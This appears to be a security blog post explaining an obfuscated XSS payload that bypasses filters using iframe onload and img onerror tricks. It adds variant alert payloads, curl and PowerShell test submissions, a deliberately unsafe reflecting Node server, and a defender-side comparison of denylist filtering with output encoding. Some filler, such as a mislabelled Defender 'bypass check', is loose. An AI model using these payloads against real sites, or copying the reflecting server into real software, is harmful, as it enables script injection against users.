The payload shared by Mark Green demonstrates a clever technique to trigger a JavaScript alert using obfuscated code within an HTML iframe and img tag. Let’s break down how this works:
<iframe/onload='this["src"]="javas&#9;cript:al"+"ert``"';><img/src=q onerror='new Function`al\ert\`1\``'>
You Should Know:
Breaking Down the Payload
1. Iframe with onload event:
<iframe/onload='this["src"]="javas&#9;cript:al"+"ert``"';>
– Uses the `/` separator, which HTML5 parsers accept in place of a space between the tag name and the first attribute (so `<iframe/onload` parses the same as `<iframe onload`)
– The `onload` handler runs as soon as the empty frame has loaded; it assigns a `javascript:` URL to the frame's `src`, which the browser then executes
– Obfuscates the `javascript:` scheme by splitting it with the HTML entity `&#9;` (a tab): the tokenizer decodes the entity inside the attribute value, and the URL parser then strips the tab, so the scheme is only recognisable after both steps
– Concatenates `"al"+"ert``"` to form alert`` (the backticks after the name make it a tagged-template call of `alert`, so no parentheses are needed)
2. Img tag with onerror event:
<img/src=q onerror='new Function`al\ert\`1\``'>
– Uses a `src` (`q`) that cannot load, so the `onerror` handler fires
– Invokes `Function` as a tagged template, so the function body is built from the template string without parentheses, and `new` then runs the resulting function
– Uses backslash escapes (\e for the letter e, \` for a literal backtick) so the template's cooked value reads alert`1`, which is itself a tagged-template call of `alert`
Practice-Verified Code Examples
Here are similar obfuscation techniques you can test:
1. Alternative alert triggering:
<div/onmouseover='window["al"+"ert"](1)'>Hover me</div>
2. Using String.fromCharCode:
<script> alert(String.fromCharCode(88,83,83)); </script>
3. Unicode obfuscation:
<script>
\u0061\u006c\u0065\u0072\u0074('XSS');
</script>
Security Implications
This technique demonstrates how attackers bypass security filters by:
– Using HTML5 flexible parsing
– Splitting keywords
– Utilizing alternative syntax
– Leveraging different event handlers
Testing Commands
For security professionals testing these payloads:
1. Linux command to test payloads:
curl -X POST http://test.site/xss-test -d "input=<iframe/onload='alert(1)'>"
2. Windows PowerShell test:
Invoke-WebRequest -Uri "http://test.site" -Body "search=<script>alert(1)</script>" -Method POST
3. Node.js test server:
const http = require('http');
http.createServer((req, res) => {
  res.writeHead(200, {'Content-Type': 'text/html'});
  // Reflects whatever follows the leading "/" of the request path straight into the HTML body
  res.end(req.url.slice(1)); // WARNING: UNSAFE, reflected-XSS test target for a local demo only
}).listen(8080);
What Undercode Say
This payload demonstrates advanced obfuscation techniques that bypass many naive XSS filters. Security professionals should be aware of:
1. HTML5 parsing quirks:
Check how the two tag forms render (the `/` separator versus a space between tag name and attribute):
diff <(echo '<iframe/onload=alert(1)>' | lynx -dump -stdin) <(echo '<iframe onload=alert(1)>' | lynx -dump -stdin)
2. JavaScript obfuscation methods:
// Deobfuscation example: decode the tab entity as the HTML tokenizer would, then drop the tab as the URL parser would (zero-width spaces are stripped too, in case the payload was padded with them)
const payload = "javas&#9;cript:al" + "ert``";
const cleaned = payload.replace(/&#9;/g, '\t').replace(/[\t\u200b]/g, '');
console.log(cleaned); // "javascript:alert``"
3. Filter bypass techniques:
# Python filter bypass simulation
import re
payload = '<img/src=q onerror=alert(1)>'
print(re.sub(r'onerror=', '', payload))  # Naive filter fails: only the exact lower-case "onerror=" is removed, so any other spelling or separator passes through
4. Browser testing commands:
Test in headless Chrome:
google-chrome --headless --disable-gpu --dump-dom 'data:text/html,<iframe/onload=alert(1)>'
5. Windows Defender bypass check:
Get-MpThreatDetection | Where-Object {$_.InitialDetectionTime -gt (Get-Date).AddHours(-24)}
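To make the filter-bypass point from "Security Implications" and from item 3 above concrete from the defender's side, here is an added example (not code from the original post; the function names are my own and the input list is constructed from the page's payloads plus one benign string). It runs each input through a denylist filter of the kind these payloads are built to slip past, and through output encoding for the HTML text context, and scores which outputs still carry active markup.

```javascript
// Added example, not code from the original post: a denylist filter of the
// kind this page's payloads are built to slip past, next to the defence that
// holds for untrusted text placed in an HTML text context, encoding on
// output. Function names are my own; the input list is constructed.

// A typical first attempt at a filter: strip <script> blocks, the
// "javascript:" scheme and a few event handler attributes, case-insensitively.
function naiveDenylist(input) {
  return input
    .replace(/<script\b[^>]*>[\s\S]*?<\/script\s*>/gi, "")
    .replace(/javascript:/gi, "")
    .replace(/\son(error|load|mouseover)\s*=/gi, " ");
}

// Output encoding for the HTML text context: the five characters that can
// open a tag, end an attribute value or start a character reference are
// replaced by references, so the browser renders them as literal text.
function escapeHtmlText(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", "\"": "&quot;", "'": "&#39;" };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// Rough heuristic used only to score the two approaches: does the string
// still carry a tag with an event handler attribute, or a <script> tag?
function looksLikeActiveMarkup(html) {
  return /<script\b|<[a-z][^>]*[\s\/]on[a-z]+\s*=/i.test(html);
}

// The page's payloads plus one benign string (constructed list for the demo).
const INPUTS = [
  "<iframe/onload='this[\"src\"]=\"javas&#9;cript:al\"+\"ert``\"';>",
  "<img/src=q onerror='new Function`al\\ert\\`1\\``'>",
  "<div/onmouseover='window[\"al\"+\"ert\"](1)'>Hover me</div>",
  "<script> alert(String.fromCharCode(88,83,83)); </script>",
  "Tom & Jerry <3",
];

// For each input, what each approach emits and whether it still looks active.
function evaluateDefences(inputs = INPUTS) {
  return inputs.map((input) => {
    const filtered = naiveDenylist(input);
    const escaped = escapeHtmlText(input);
    return {
      input,
      denylist: { output: filtered, active: looksLikeActiveMarkup(filtered) },
      escaped: { output: escaped, active: looksLikeActiveMarkup(escaped) },
    };
  });
}

// How many inputs survive each approach with active markup intact?
function survivorCounts(inputs = INPUTS) {
  const rows = evaluateDefences(inputs);
  return {
    denylist: rows.filter((r) => r.denylist.active).length,
    escaped: rows.filter((r) => r.escaped.active).length,
  };
}

for (const row of evaluateDefences()) {
  console.log(JSON.stringify(row));
}
console.log(JSON.stringify(survivorCounts()));
```

The denylist catches the two payloads it was written for (the `<script>` block and the space-separated `onerror=`) and misses the two that use `/` as the attribute separator, because it only knows the spellings it has seen; the entity-split scheme also sails past the `javascript:` rule. Output encoding never inspects the input at all: with no `<` left in the output there is no tag boundary for the browser to act on, and the benign string still renders correctly as "Tom & Jerry <3". This encoder is for the HTML text context only; text placed inside an attribute, a URL or a script block needs the encoder for that context.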
Expected Output:
The payload successfully triggers a JavaScript alert through clever obfuscation techniques that bypass basic XSS filters, demonstrating the need for robust security measures in web applications.
Reported by: Hackers Feeds
Extra hub: Undercode MoN